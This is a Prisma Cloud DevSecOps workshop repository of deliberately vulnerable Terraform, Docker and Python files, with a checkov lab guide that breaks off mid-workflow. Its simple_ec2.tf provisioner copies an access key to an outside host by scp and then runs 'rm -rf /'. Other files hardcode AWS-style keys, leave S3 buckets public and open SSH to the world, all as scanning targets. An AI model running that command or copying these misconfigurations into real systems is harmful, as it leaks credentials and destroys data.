├── .gitignore ├── README.md ├── code ├── Dockerfile ├── deployment_ec2.tf ├── deployment_s3.tf ├── hello.py ├── requirements.txt ├── simple_ec2.tf └── simple_s3.tf └── guide ├── DevSecOps-lab.md └── images ├── aws-create-stack.png ├── aws-s3-properties.png ├── aws-s3.png ├── aws-tag-drift.png ├── c9-blank-shell.png ├── c9-checkov-api-key.png ├── c9-checkov-d.png ├── c9-checkov-list.png ├── c9-checkov-options.png ├── c9-close-welcome.png ├── c9-console-home.png ├── c9-create-env.png ├── c9-env-options1.png ├── c9-env-options2.png ├── c9-env-options3.png ├── c9-git-clone.png ├── c9-install-checkov.png ├── c9-open-ide.png ├── c9-open-term.png ├── c9-py-venv.png ├── checkov-custom-checks.png ├── checkov-result.png ├── checkov-secrets.png ├── devsecops-workflow.png ├── ee-creds.png ├── ee-login.png ├── ee-sign-in.png ├── gh-action-commit.png ├── gh-action-edit.png ├── gh-actions-new-workflow.png ├── gh-actions-results.png ├── gh-actions-tab.png ├── gh-actions-workflows.png ├── gh-blocked-pr.png ├── gh-bp-rule.png ├── gh-branch-protection.png ├── gh-clone.png ├── gh-commit-directly.png ├── gh-commit-s3-change.png ├── gh-create-fork.png ├── gh-create-pr.png ├── gh-edit-checkov.png ├── gh-edit-s3.png ├── gh-fork.png ├── gh-merge-pr-fix.png ├── gh-new-file.png ├── gh-open-pr.png ├── gh-pr-fix1.png ├── gh-pr-fix2.png ├── gh-pr-merge.png ├── gh-pr.png ├── gh-prisma-comments.png ├── gh-propose-changes.png ├── gh-secret-created.png ├── gh-security-results.png ├── gh-select-repos.png ├── ghas-code-scanning-results.png ├── ghas-overview.png ├── github-create-secret.png ├── github-repo-secret.png ├── github-secrets.png ├── iam-console-home.png ├── iam-create-key.png ├── iam-create-user.png ├── iam-dashboard.png ├── iam-key-created.png ├── iam-key-options.png ├── iam-key-tag-and-create.png ├── iam-retrieve-key-data.png ├── iam-review-create.png ├── iam-set-perms.png ├── iam-user-details.png ├── prisma-access-control.png ├── prisma-access-key-created.png ├── prisma-appsec-home.png 
├── prisma-appsec-projects.png ├── prisma-aws-added.png ├── prisma-aws1.png ├── prisma-aws2.png ├── prisma-aws3.png ├── prisma-aws4.png ├── prisma-cfn-output.png ├── prisma-cfn.png ├── prisma-checkov-api-key.png ├── prisma-checkov-results.png ├── prisma-cicd-risks.png ├── prisma-cloud-account.png ├── prisma-code-build-providers.png ├── prisma-connect-providers.png ├── prisma-create-access-key.png ├── prisma-csp-onboarding.png ├── prisma-dashboard-code.png ├── prisma-drift-result.png ├── prisma-enforcement-rules.png ├── prisma-enforcement-rules1.png ├── prisma-enforcement-rules2.png ├── prisma-enforcement-rules3.png ├── prisma-gh-app-results.png ├── prisma-gh-app.png ├── prisma-gh-auth.png ├── prisma-gh-done.png ├── prisma-gha-results.png ├── prisma-inventory.png ├── prisma-pr-fix1.png ├── prisma-pr-fix2.png ├── prisma-providers.png ├── prisma-sbom.png ├── prisma-select-repos.png ├── prisma-tfc-done.png ├── prisma-tfc-org.png ├── prisma-tfc-rt.png ├── prisma-tfc-token.png ├── prisma-tfc-workspace.png ├── prisma-traced-resource-policies.png ├── prisma-welcome.png ├── tfc-add-github.png ├── tfc-add-repo.png ├── tfc-apply-run.png ├── tfc-apply.png ├── tfc-configure-variables.png ├── tfc-create-token.png ├── tfc-org-details.png ├── tfc-plan-running.png ├── tfc-post-plan.png ├── tfc-pr-fix.png ├── tfc-run-queued.png ├── tfc-run-task-created.png ├── tfc-token-created.png ├── tfc-vars1.png ├── tfc-vars2.png ├── tfc-vcs-workflow.png ├── tfc-welcome.png ├── tfc-workspace-created.png ├── tfc-workspace1.png ├── tfc-workspace2.png ├── tfc-workspace3.png ├── vscode-extension.png ├── vscode-ide1.png ├── vscode-ide2.png ├── workshop-flow.png └── yor-tags.png /.gitignore: -------------------------------------------------------------------------------- 1 | # Generics 2 | .DS_Store 3 | 4 | # Local .terraform directories 5 | **/.terraform/* 6 | 7 | # .tfstate files 8 | *.tfstate 9 | *.tfstate.* 10 | 11 | # Crash log files 12 | crash.log 13 | crash.*.log 14 | 15 | # Exclude all .tfvars 
files, which are likely to contain sensitive data, such as 16 | # password, private keys, and other secrets. These should not be part of version 17 | # control as they are data points which are potentially sensitive and subject 18 | # to change depending on the environment. 19 | *.tfvars 20 | *.tfvars.json 21 | 22 | # Ignore override files as they are usually used to override resources locally and so 23 | # are not checked in 24 | override.tf 25 | override.tf.json 26 | *_override.tf 27 | *_override.tf.json 28 | 29 | # Include override files you do wish to add to version control using negated pattern 30 | # !example_override.tf 31 | 32 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan 33 | # example: *tfplan* 34 | 35 | # Ignore CLI configuration files 36 | .terraformrc 37 | terraform.rc 38 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # prisma-cloud-devsecops-workshop 2 | DevSecOps with Prisma Cloud 3 | -------------------------------------------------------------------------------- /code/Dockerfile: -------------------------------------------------------------------------------- 1 | #old ubuntu 2 | FROM ubuntu:18.04 3 | 4 | RUN apt update 5 | RUN apt install -y nginx php-fpm 6 | 7 | # RUN pip install --no-cahce-dir --upgrade pip && \ 8 | # pip install --no-cahce-dir requests=2.26.0 && \ 9 | # pip install --no-cahce-dir django==1.2 10 | 11 | COPY requirements.txt /requirements.txt 12 | COPY hello.py /hello.py 13 | CMD ["python3 hello.py"] 14 | 15 | EXPOSE 80 443 16 | -------------------------------------------------------------------------------- /code/deployment_ec2.tf: -------------------------------------------------------------------------------- 1 | resource "aws_instance" "web_host" { 2 | # ec2 have plain text secrets in user data 3 | ami = "${var.ami}" 4 | instance_type = "t2.nano" 5 | 6 
| vpc_security_group_ids = [ 7 | "${aws_security_group.web-node.id}"] 8 | subnet_id = "${aws_subnet.web_subnet.id}" 9 | user_data = <Deployed via Terraform" | sudo tee /var/www/html/index.html 19 | EOF 20 | 21 | } 22 | 23 | resource "aws_ebs_volume" "web_host_storage" { 24 | # unencrypted volume 25 | availability_zone = "${var.region}a" 26 | #encrypted = false # Setting this causes the volume to be recreated on apply 27 | size = 1 28 | 29 | } 30 | 31 | resource "aws_ebs_snapshot" "example_snapshot" { 32 | # ebs snapshot without encryption 33 | volume_id = "${aws_ebs_volume.web_host_storage.id}" 34 | description = "${local.resource_prefix.value}-ebs-snapshot" 35 | 36 | } 37 | 38 | resource "aws_volume_attachment" "ebs_att" { 39 | device_name = "/dev/sdh" 40 | volume_id = "${aws_ebs_volume.web_host_storage.id}" 41 | instance_id = "${aws_instance.web_host.id}" 42 | } 43 | 44 | resource "aws_security_group" "web-node" { 45 | # security group is open to the world in SSH port 46 | name = "${local.resource_prefix.value}-sg" 47 | description = "${local.resource_prefix.value} Security Group" 48 | vpc_id = aws_vpc.web_vpc.id 49 | 50 | ingress { 51 | from_port = 80 52 | to_port = 80 53 | protocol = "tcp" 54 | cidr_blocks = [ 55 | "0.0.0.0/0"] 56 | } 57 | ingress { 58 | from_port = 22 59 | to_port = 22 60 | protocol = "tcp" 61 | cidr_blocks = [ 62 | "0.0.0.0/0"] 63 | } 64 | egress { 65 | from_port = 0 66 | to_port = 0 67 | protocol = "-1" 68 | cidr_blocks = [ 69 | "0.0.0.0/0"] 70 | } 71 | depends_on = [aws_vpc.web_vpc] 72 | 73 | } 74 | 75 | resource "aws_vpc" "web_vpc" { 76 | cidr_block = "172.16.0.0/16" 77 | enable_dns_hostnames = true 78 | enable_dns_support = true 79 | 80 | } 81 | 82 | resource "aws_subnet" "web_subnet" { 83 | vpc_id = aws_vpc.web_vpc.id 84 | cidr_block = "172.16.10.0/24" 85 | availability_zone = "${var.region}a" 86 | map_public_ip_on_launch = true 87 | 88 | 89 | } 90 | 91 | resource "aws_subnet" "web_subnet2" { 92 | vpc_id = aws_vpc.web_vpc.id 93 | 
cidr_block = "172.16.11.0/24" 94 | availability_zone = "${var.region}b" 95 | map_public_ip_on_launch = true 96 | 97 | 98 | } 99 | 100 | 101 | resource "aws_internet_gateway" "web_igw" { 102 | vpc_id = aws_vpc.web_vpc.id 103 | 104 | 105 | } 106 | 107 | resource "aws_route_table" "web_rtb" { 108 | vpc_id = aws_vpc.web_vpc.id 109 | 110 | 111 | } 112 | 113 | resource "aws_route_table_association" "rtbassoc" { 114 | subnet_id = aws_subnet.web_subnet.id 115 | route_table_id = aws_route_table.web_rtb.id 116 | } 117 | 118 | resource "aws_route_table_association" "rtbassoc2" { 119 | subnet_id = aws_subnet.web_subnet2.id 120 | route_table_id = aws_route_table.web_rtb.id 121 | } 122 | 123 | resource "aws_route" "public_internet_gateway" { 124 | route_table_id = aws_route_table.web_rtb.id 125 | destination_cidr_block = "0.0.0.0/0" 126 | gateway_id = aws_internet_gateway.web_igw.id 127 | 128 | timeouts { 129 | create = "5m" 130 | } 131 | } 132 | 133 | resource "aws_network_interface" "web-eni" { 134 | subnet_id = aws_subnet.web_subnet.id 135 | private_ips = ["172.16.10.100"] 136 | 137 | } 138 | 139 | # VPC Flow Logs to S3 140 | resource "aws_flow_log" "vpcflowlogs" { 141 | log_destination = aws_s3_bucket.flowbucket.arn 142 | log_destination_type = "s3" 143 | traffic_type = "ALL" 144 | vpc_id = aws_vpc.web_vpc.id 145 | 146 | 147 | } 148 | 149 | resource "aws_s3_bucket" "flowbucket" { 150 | bucket = "${local.resource_prefix.value}-flowlogs" 151 | force_destroy = true 152 | 153 | } 154 | 155 | # OUTPUTS 156 | output "ec2_public_dns" { 157 | description = "Web Host Public DNS name" 158 | value = aws_instance.web_host.public_dns 159 | } 160 | 161 | output "vpc_id" { 162 | description = "The ID of the VPC" 163 | value = aws_vpc.web_vpc.id 164 | } 165 | 166 | output "public_subnet" { 167 | description = "The ID of the Public subnet" 168 | value = aws_subnet.web_subnet.id 169 | } 170 | 171 | output "public_subnet2" { 172 | description = "The ID of the Public subnet" 173 | value = 
aws_subnet.web_subnet2.id 174 | } 175 | -------------------------------------------------------------------------------- /code/deployment_s3.tf: -------------------------------------------------------------------------------- 1 | resource "aws_s3_bucket" "data" { 2 | # bucket is public 3 | # bucket is not encrypted 4 | # bucket does not have access logs 5 | # bucket does not have versioning 6 | bucket = "${local.resource_prefix.value}-data" 7 | force_destroy = true 8 | 9 | } 10 | 11 | resource "aws_s3_bucket_object" "data_object" { 12 | bucket = aws_s3_bucket.data.id 13 | key = "customer-master.xlsx" 14 | source = "resources/customer-master.xlsx" 15 | 16 | } 17 | 18 | resource "aws_s3_bucket" "financials" { 19 | # bucket is not encrypted 20 | # bucket does not have access logs 21 | # bucket does not have versioning 22 | bucket = "${local.resource_prefix.value}-financials" 23 | acl = "private" 24 | force_destroy = true 25 | 26 | } 27 | 28 | resource "aws_s3_bucket" "operations" { 29 | # bucket is not encrypted 30 | # bucket does not have access logs 31 | bucket = "${local.resource_prefix.value}-operations" 32 | acl = "private" 33 | versioning { 34 | enabled = true 35 | } 36 | force_destroy = true 37 | 38 | } 39 | 40 | resource "aws_s3_bucket" "data_science" { 41 | # bucket is not encrypted 42 | bucket = "${local.resource_prefix.value}-data-science" 43 | acl = "private" 44 | versioning { 45 | enabled = true 46 | } 47 | logging { 48 | target_bucket = "${aws_s3_bucket.logs.id}" 49 | target_prefix = "log/" 50 | } 51 | force_destroy = true 52 | 53 | } 54 | 55 | resource "aws_s3_bucket" "logs" { 56 | bucket = "${local.resource_prefix.value}-logs" 57 | acl = "log-delivery-write" 58 | versioning { 59 | enabled = true 60 | } 61 | server_side_encryption_configuration { 62 | rule { 63 | apply_server_side_encryption_by_default { 64 | sse_algorithm = "aws:kms" 65 | kms_master_key_id = "${aws_kms_key.logs_key.arn}" 66 | } 67 | } 68 | } 69 | force_destroy = true 70 | 71 | } 72 | 
-------------------------------------------------------------------------------- /code/hello.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import django 3 | import flask 4 | 5 | AWS_ACCESS_KEY_ID="AKIAIOSFODNN7EXAMAAAZYX" 6 | AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY" 7 | 8 | 9 | def main(): 10 | print("hello") 11 | 12 | 13 | if __name__ == "__main__": 14 | main() 15 | 16 | -------------------------------------------------------------------------------- /code/requirements.txt: -------------------------------------------------------------------------------- 1 | django==1.2 2 | flask==0.6 3 | requests==2.26.0 4 | -------------------------------------------------------------------------------- /code/simple_ec2.tf: -------------------------------------------------------------------------------- 1 | provider "aws" { 2 | region = "us-west-2" 3 | } 4 | 5 | resource "aws_ec2_host" "test" { 6 | instance_type = "t3.micro" 7 | availability_zone = "us-west-2a" 8 | 9 | provisioner "local-exec" { 10 | command = "echo Running install scripts.. 
'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /code/simple_s3.tf: -------------------------------------------------------------------------------- 1 | provider "aws" { 2 | region = "us-west-2" 3 | } 4 | 5 | resource "aws_s3_bucket" "dev_s3" { 6 | bucket_prefix = "dev-" 7 | 8 | tags = { 9 | Environment = "Dev" 10 | } 11 | } 12 | 13 | 14 | -------------------------------------------------------------------------------- /guide/DevSecOps-lab.md: -------------------------------------------------------------------------------- 1 | # Welcome 2 | 3 | This workshop will demonstrate how to leverage infrastructure as code (IaC) and DevSecOps patterns to automate, scale, and improve the security posture of cloud infrastructure and applications. We will create a pipeline that ensures our configurations are secure and compliant from code to cloud. 4 | 5 | This guide provides step-by-step instructions to integrate **Prisma Cloud** (and **checkov**) with **Terraform Cloud, GitHub, VScode** and **AWS**. 
6 | 7 | ![](images/workshop-flow.png) 8 | 9 | ![](images/devsecops-workflow.png) 10 | 11 | 12 | 13 | ## Table of Contents 14 | 15 | - [Welcome](#welcome) 16 | - [Table of Contents ](#table-of-contents) 17 | - [Learning Objectives](#learning-objectives) 18 | - [DevSecOps](#devsecops) 19 | - [Infrastructure as Code Using Terraform](#infrastructure-as-code-using-terraform) 20 | 21 | - [Section 0: Setup AWS Environment](#section-0-setup) 22 | - [Prerequisites](#prerequisities) 23 | - [Log into AWS Event Engine](#log-into-aws-event-engine) 24 | - [Configure IAM User and API Key](#configure-iam-user-and-api-key) 25 | - [Configure Cloud9](#configure-cloud9) 26 | 27 | - [Section 1: Code Scanning with checkov](#section-1-code-scanning-with-checkov) 28 | - [Install checkov](#install-checkov) 29 | - [Fork and clone target repository](#fork-and-clone-target-repository) 30 | - [Scan with checkov](#scan-with-checkov) 31 | - [Custom Policies](#custom-policies) 32 | - [IDE plugin](#ide-plugin) 33 | - [Integrate with GitHub Actions](#integrate-with-GitHub-actions) 34 | - [View results in GitHub Security](#view-results-in-GitHub-secuirty) 35 | - [Tag and Trace with yor](#tag-and-trace-with-yor) 36 | - [Branch Protection Rules](#branch-protection-rules) 37 | - [BONUS: Pre-commit hooks](#bonus-pre-commit-hooks) 38 | - [Integrate workflow with Terraform Cloud](#integrate-workflow-with-terraform-cloud) 39 | - [Block a Pull Request, Prevent a Deployment](#block-a-pull-request-prevent-a-deployment) 40 | - [Deploy to AWS](#deploy-to-aws) 41 | 42 | - [Section 2: Application Security with Prisma Cloud](#section-2-application-security-with-prisma-cloud) 43 | - [Welcome to Prisma Cloud](#welcome-to-prisma-cloud) 44 | - [Onboard AWS account](#onboard-aws-account) 45 | - [Integrations and Providers](#integrations-and-providers) 46 | - [Checkov with API Key](#checkov-with-api-key) 47 | - [Terraform Cloud Run Tasks](#terraform-cloud-run-tasks) 48 | - [GitHub Application](#GitHub-application) 49 | 
- [Submit a Pull Request 2.0](#submit-a-pull-request-20) 50 | - [View scan results in Prisma Cloud](#view-scan-results-in-prisma-cloud) 51 | - [Issue a PR Fix](#issue-a-pr-fix) 52 | - [Drift Detection](#drift-detection) 53 | 54 | - [Wrapping Up](#wrapping-up) 55 | 56 | 57 | ## Learning Objectives 58 | - Gain an understanding of DevSecOps and infrastructure as code (IaC) using Terraform 59 | - Scan IaC files for misconfigurations locally 60 | - Set up CI/CD pipelines to automate security scanning and policy enforcement 61 | - Fix security findings and AWS resource misconfigurations with Prisma Cloud 62 | 63 | **Let’s start with a few core concepts...** 64 | 65 | ## DevSecOps 66 | The foundation of DevSecOps lies in the DevOps movement, wherein development and operations functions have merged to make deployments faster, safer, and more repeatable. Common DevOps practices include automated infrastructure build pipelines (CI/CD) and version-controlled manifests (GitOps) to make it easier to control cloud deployments. By baking software and infrastructure quality requirements into the release lifecycle, teams save the time they would otherwise spend manually reviewing code, letting them focus on shipping features. 67 | 68 | As deployments to production speed up, however, many traditional cloud security concepts break down. With the rise of containerized technologies, serverless functions, and IaC frameworks, it is increasingly hard to maintain visibility of cloud security posture. 69 | 70 | By leveraging DevOps foundations, security and development teams can build security scanning and policy enforcement into automated pipelines. The ultimate goal with DevSecOps is to “shift cloud security left.” That means automating it and embedding it earlier into the development lifecycle so that actions can be taken earlier. Preventing risky deployments is a more proactive approach than traditional cloud security, which often slows down development teams with deployment rollbacks and disruptive fixes. 
71 | 72 | For DevSecOps to be successful for teams working to build and secure infrastructure, embracing existing tools and workflows is critical. At Palo Alto Networks, we’re committed to making it as simple, effective, and painless as possible to automate security controls and integrate them seamlessly into standard workflows. 73 | 74 | 75 | 76 | 77 | ## Infrastructure as Code Using Terraform 78 | Infrastructure as code (IaC) frameworks, such as HashiCorp Terraform, make cloud provisioning scalable and straightforward by leveraging automation and code. Defining our cloud infrastructure in code simplifies repetitive DevOps tasks and gives us a versioned, auditable source of truth for the state of an environment. 79 | 80 | Terraform is useful for defining resource configurations and interacting with APIs in a codified, stateful manner. Any updates we want to make, such as adding more instances, or changes to a configuration, can be handled by Terraform. 81 | 82 | For example, the following Terraform resource block defines a simple AWS S3 bucket (the `public-read-write` ACL makes it world-readable and world-writable, which is the kind of misconfiguration the scans later in this workshop are meant to catch): 83 | 84 | ```hcl 85 | resource "aws_s3_bucket" "data" { 86 | bucket = "my_bucket_name" 87 | acl = "public-read-write" 88 | } 89 | ``` 90 | 91 | After performing `terraform init`, we can provision an S3 bucket with the following command: 92 | 93 | ```bash 94 | terraform apply 95 | ``` 96 | 97 | Any changes made to the resource definition within a .tf file, such as adding tags or changing the acl, can be pushed with the `terraform apply` command. 98 | 99 | Another benefit of using Terraform to define infrastructure is that code can be scanned for misconfigurations before the resource is created. This allows for security controls to be integrated into the development process, preventing issues from ever being introduced, deployed and exploited. 
100 | 101 | # Section 0: Setup AWS Environment 102 | 103 | ## Prerequisities 104 | - GitHub account 105 | - Terraform Cloud account 106 | - AWS account (provided during workshop) 107 | - Prisma Cloud account (OPTIONAL) 108 | 109 | ## Log into AWS Event Engine 110 | > [!NOTE] 111 | > *This section is for live workshop events only.* 112 | 113 | Follow the link provided to you for Event Engine. Enter the event hash (if it is not already populated), and click `Accept Terms & Login`. 114 | 115 | ![ee-login](images/ee-login.png) 116 | 117 | Choose your preferred sign-in method (OTP is recommended for workshop attendees). 118 | 119 | ![ee-sign-in](images/ee-sign-in.png) 120 | 121 | Once logged in, copy the provided credentials into a local text file and then click `Open Console` to navigate to AWS. 122 | 123 | ![ee-creds](images/ee-creds.png) 124 | 125 | ## Configure IAM User and API Key 126 | 127 | From the AWS console, select `IAM` or search for 'IAM' in the Search bar if not displayed. 128 | 129 | ![iam-console-home](images/iam-console-home.png) 130 | 131 | In the IAM Dashboard, click `Users` on the left sidebar. 132 | 133 | ![iam-dashboard](images/iam-dashboard.png) 134 | 135 | Click the `Create User` button on the top right. 136 | 137 | ![create-user](images/iam-create-user.png) 138 | 139 | Specify a `User name` that will be unique then click `Next`. 140 | 141 | ![user-details](images/iam-user-details.png) 142 | 143 | Next, set the permissions for the user by selecting `Attach policies directly` and attaching the `AdministratorAccess` policy. This policy grants full administrative rights and is used here for convenience in the workshop-provided account; in any longer-lived account, attach only the permissions the deployment needs. 144 | 145 | ![iam-set-perms](images/iam-set-perms.png) 146 | 147 | Review the user details and click `Create user`. 148 | 149 | ![iam-review-create](images/iam-review-create.png) 150 | 151 | Now we need to assign an API key to the user we just created. Click on the user you just created from the IAM Dashboard and then click `Create access key` on the right. 
152 | 153 | ![iam-create-key](images/iam-create-key.png) 154 | 155 | Select `Other` from the Access Key options. 156 | 157 | ![iam-key-options](images/iam-key-options.png) 158 | 159 | Optionally, supply a tag to associate with the Access Key, then click `Create access key`. 160 | 161 | ![iam-key-tag-and-create](images/iam-key-tag-and-create.png) 162 | 163 | Finally, save the Access Key data provided (copy to a local file). Keep that file outside the cloned repository so the key is never committed. This credential will be used to deploy resources to AWS in a later section. When ready, click `Done`. 164 | 165 | ![iam-retrieve-key-data](images/iam-retrieve-key-data.png) 166 | 167 | An access key will now appear on the User details page. 168 | 169 | ![iam-key-created](images/iam-key-created.png) 170 | 171 | 172 | ## Configure Cloud9 173 | To ensure we all have the same environment configuration, we will use Cloud9, a cloud-delivered IDE from AWS, to carry out many of the steps in this workshop. To set this up, navigate back to the AWS Console home and select Cloud9 (or enter it into the Search bar). 174 | 175 | 176 | ![c9-console-home](images/c9-console-home.png) 177 | 178 | On the Cloud9 Environments page, click `Create Environment`. 179 | 180 | ![c9-create-env](images/c9-create-env.png) 181 | 182 | Enter a `Name` for the Environment and select `New EC2 instance` for Environment Type. 183 | 184 | ![c9-env-options1](images/c9-env-options1.png) 185 | 186 | Select `Additional instance types` then choose `t3.medium` from the drop-down. 187 | 188 | ![c9-env-options2](images/c9-env-options2.png) 189 | 190 | Leave all other options at their default settings and click `Create`. 191 | 192 | ![c9-env-options3](images/c9-env-options3.png) 193 | 194 | 195 | Once the environment is created, navigate to it and click `Open in Cloud9` to launch the IDE. 196 | 197 | ![c9-open-ide](images/c9-open-ide.png) 198 | 199 | Close all of the default windows, then create a New Terminal window. 
200 | 201 | ![c9-close-welcome](images/c9-close-welcome.png) 202 | 203 | ![c9-open-term](images/c9-open-term.png) 204 | 205 | ![c9-blank-term](images/c9-blank-shell.png) 206 | 207 | Congrats! Cloud9 is now ready to use. Before installing checkov or pulling code to scan, create and activate a python virtual environment to better organize python packages. 208 | 209 | ``` 210 | python3 -m venv env 211 | source ./env/bin/activate 212 | ``` 213 | 214 | ![c9-py-venv](images/c9-py-venv.png) 215 | 216 | ## 217 | # Section 1: Code Scanning with checkov 218 | 219 | [Checkov](https://checkov.io) is an open source 'policy-as-code' tool that scans cloud infrastructure definitions to find misconfigurations before they are deployed. Some of the key benefits of checkov: 220 | 1. Runs as a command line interface (CLI) tool 221 | 2. Supports many common platforms and frameworks 222 | 3. Ships with thousands of default policies 223 | 4. Works on windows/mac/linux (any system with python installed) 224 | 225 | ## Install checkov 226 | 227 | To get started, install checkov using pip: 228 | 229 | ``` 230 | pip3 install checkov 231 | ``` 232 | 233 | ![](images/c9-install-checkov.png) 234 | 235 | 236 | 237 | 238 | Use the `--version` and `--help` flags to verify the install and view usage / optional arguments. 239 | 240 | ``` 241 | checkov --version 242 | checkov --help 243 | ``` 244 | ![](images/c9-checkov-options.png) 245 | 246 | To see a list of every policy that checkov can enforce, use the `-l` or `--list` options. 247 | 248 | ``` 249 | checkov --list 250 | ``` 251 | 252 | Now that you see what checkov can do, let's get some code to scan... 253 | 254 | 255 | 256 | ## Fork and clone target repository 257 | This workshop involves code that is vulnerable-by-design. All of the necessary code is contained within [this repository](https://GitHub.com/paloAltoNetworks/prisma-cloud-devsecops-workshop) or the workshop guide itself. 
258 | 259 | To begin, log into GitHub and navigate to the [Prisma Cloud DevSecOps Workshop](https://GitHub.com/paloAltoNetworks/prisma-cloud-devsecops-workshop) repository. Create a `Fork` of this repository to create a copy of the code in your own account. 260 | 261 | ![](images/gh-fork.png) 262 | 263 | Ensure the selected `Owner` matches your username, then proceed to fork the repository by clicking `Create fork`. 264 | 265 | ![](images/gh-create-fork.png) 266 | 267 | Grab the repo URL from GitHub, then clone the **forked** repository to Cloud9. 268 | 269 | ![](images/gh-clone.png) 270 | 271 | ``` 272 | git clone https://github.com/<your-username>/prisma-cloud-devsecops-workshop.git 273 | cd prisma-cloud-devsecops-workshop/ 274 | git status 275 | 276 | ``` 277 | 278 | ![](images/c9-git-clone.png) 279 | 280 | 281 | Great! Now we have some code to scan. Let's jump in... 282 | 283 | 284 | 285 | ## Scan with checkov 286 | 287 | Checkov can be configured to scan files and enforce policies in many different ways. To highlight a few: 288 | 1. Scans can run on individual files or entire directories. 289 | 2. Policies can be chosen by inclusion or omission. 290 | 3. Enforcement can be determined by flags that control checkov's exit code. 291 | 292 | 293 | Let's start by scanning the entire `./code` directory and viewing the results. 294 | 295 | ``` 296 | cd code/ 297 | checkov -d . 298 | ``` 299 | ![](images/c9-checkov-d.png) 300 | 301 | Failed checks are returned containing the offending file and resource, the lines of code that triggered the policy, and a guide to fix the issue. 302 | 303 | ![](images/checkov-result.png) 304 | 305 | Now try running checkov on an individual file with `checkov -f <file>`. 306 | 307 | ``` 308 | checkov -f deployment_ec2.tf 309 | ``` 310 | ``` 311 | checkov -f simple_ec2.tf 312 | ``` 313 | 314 | > **⍰ Question** 315 | > 316 | > Why are there more security findings for `deployment_ec2.tf` than there are for `simple_ec2.tf`? 
What about `simple_s3.tf` vs `simple_ec2.tf`? 317 | 318 | 319 | Policies can be optionally enforced or skipped with the `--check` and `--skip-check` flags. 320 | 321 | ``` 322 | checkov -f deployment_s3.tf --check CKV_AWS_18,CKV_AWS_52 323 | ``` 324 | ``` 325 | checkov -f deployment_s3.tf --skip-check CKV_AWS_18,CKV_AWS_52 326 | ``` 327 | 328 | Frameworks can also be selected or omitted for a particular scan. 329 | 330 | 331 | ``` 332 | checkov -d . --framework secrets --enable-secret-scan-all-files 333 | ``` 334 | ``` 335 | checkov -d . --skip-framework dockerfile 336 | ``` 337 | 338 | ![](images/checkov-secrets.png) 339 | 340 | 341 | Lastly, enforcement can be more granularly controlled by using the `--soft-fail` option. Applying `--soft-fail` results in the scan always returning a 0 exit code. Using `--hard-fail-on` overrides this option. 342 | 343 | Check the exit code when running `checkov -d . ` with and without the `--soft-fail` option. 344 | 345 | ``` 346 | checkov -d . ; echo $? 347 | ``` 348 | ``` 349 | checkov -d . --soft-fail ; echo $? 350 | ``` 351 | 352 | An example of using `--soft-fail` and exit codes in a pipeline context will be demonstrated in a later section. 353 | 354 | 355 | ## Custom Policies 356 | 357 | Checkov supports the creation of [Custom Policies](https://www.checkov.io/3.Custom%20Policies/YAML%20Custom%20Policies.html) for users to customize their own policy and configuration checks. Custom policies can be written in YAML (recommended) or python and applied with the `--external-checks-dir` or `--external-checks-git` flags. 358 | 359 | Let's create a custom policy to check for [local-exec and remote-exec Provisioners](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec) being used in Terraform resource definitions. (Follow the link to learn more about provisioners and why it is a good idea to check for them.) 
360 | 361 | ```yaml 362 | metadata: 363 | name: "Terraform contains local-exec and/or remote-exec provisioner" 364 | id: "CKV2_TF_1" 365 | category: "GENERAL_SECURITY" 366 | definition: 367 | and: 368 | - cond_type: "attribute" 369 | resource_types: all 370 | attribute: "provisioner/local-exec" 371 | operator: "not_exists" 372 | - cond_type: "attribute" 373 | resource_types: all 374 | attribute: "provisioner/remote-exec" 375 | operator: "not_exists" 376 | ``` 377 | Add the above code to a new file within a new directory. 378 | 379 | ``` 380 | mkdir custom-checks/ 381 | vim custom-checks/check.yaml 382 | ``` 383 | >[!TIP] 384 | > use `echo '$(file_contents)' > custom-checks/check.yaml` if formatting is an issue with vim. 385 | 386 | 387 | Save the file. Then run checkov with the `--external-checks-dir` flag to test the custom policy. 388 | 389 | ``` 390 | checkov -f simple_ec2.tf --external-checks-dir custom-checks 391 | ``` 392 | ![](images/checkov-custom-checks.png) 393 | 394 | **Challenge:** write a custom policy to check all resources for the presence of tags. Specifically, ensure that a tag named "Environment" exists. 395 | 396 | 397 | ## IDE plugin 398 | > [!NOTE] 399 | > *Demo Only. Requires API key for Prisma Cloud.* 400 | > 401 | > Link to docs: [Prisma Cloud IDE plugins](https://docs.prismacloud.io/en/classic/appsec-admin-guide/get-started/connect-your-repositories/integrate-ide/integrate-ide) 402 | > 403 | > Link to docs: [VScode extension](https://marketplace.visualstudio.com/items?itemName=Bridgecrew.checkov) 404 | 405 | Enabling checkov in an IDE provides real-time scan results and inline fix suggestions to developers as they create cloud infrastructure and applications. 
406 | 407 | ![](images/vscode-extension.png) 408 | 409 | ![](images/vscode-ide1.png) 410 | 411 | ![](images/vscode-ide2.png) 412 | 413 | 414 | ## Integrate with GitHub Actions 415 | Now that we are more familiar with some of checkov's basic functionality, let's see what it can do when integrated with other tools like GitHub Actions. 416 | 417 | You can leverage GitHub Actions to run automated scans for every build or specific builds, such as the ones that merge into the master branch. This action can alert on misconfigurations, or block code from being merged if certain policies are violated. Results can also be sent to Prisma Cloud and other sources for further review and remediation steps. 418 | 419 | Let's begin by setting up an action from the repository page, under the `Actions` tab. Then click on `set up a workflow yourself ->` to create a new action from scratch. 420 | 421 | 422 | 423 | 424 | Name the file `checkov.yaml` and add the following code snippet into the editor. The snippet references its actions by mutable branch or tag names (`@master`, `@v2`, `@v3`), which keeps the lab simple; in a production pipeline, pin third-party actions to a full commit SHA so the code that runs cannot change without a reviewed update. 425 | 426 | ```yaml 427 | name: checkov 428 | on: 429 | pull_request: 430 | push: 431 | branches: 432 | - main 433 | jobs: 434 | scan: 435 | runs-on: ubuntu-latest 436 | permissions: 437 | contents: read # for actions/checkout to fetch code 438 | security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results 439 | 440 | steps: 441 | - uses: actions/checkout@v2 442 | 443 | - name: Run checkov 444 | id: checkov 445 | uses: bridgecrewio/checkov-action@master 446 | with: 447 | directory: code/ 448 | #soft_fail: true 449 | #api-key: ${{ secrets.BC_API_KEY }} 450 | #env: 451 | #PRISMA_API_URL: 